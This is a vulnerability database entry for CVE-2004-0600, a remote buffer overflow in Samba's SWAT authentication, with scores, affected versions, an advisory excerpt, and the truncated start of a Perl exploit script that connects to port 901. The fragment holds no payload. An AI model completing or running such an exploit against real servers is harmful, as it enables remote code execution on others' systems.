CVE-2004-0600

Published: 27/07/2004 Updated: 11/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote malicious users to execute arbitrary code via an invalid base-64 character during HTTP basic authentication.

Vulnerable Product

samba samba 3.0.2

samba samba 3.0.2a

samba samba 3.0.3

samba samba 3.0.4

trustix secure linux 2.0

trustix secure linux 2.1

trustix secure linux 1.5

Vendor Advisories

Synopsis: samba security update
Type/Severity: Security Advisory: Important
Topic: Updated samba packages that fix buffer overflows, as well as other various bugs, are now available.
Description: Samba provides file and printer sharing services to SMB/CIFS clients. Evgeny Demidov discovered a f ...

Exploits

#!/usr/bin/perl
# Samba 304 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd
#
use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host ...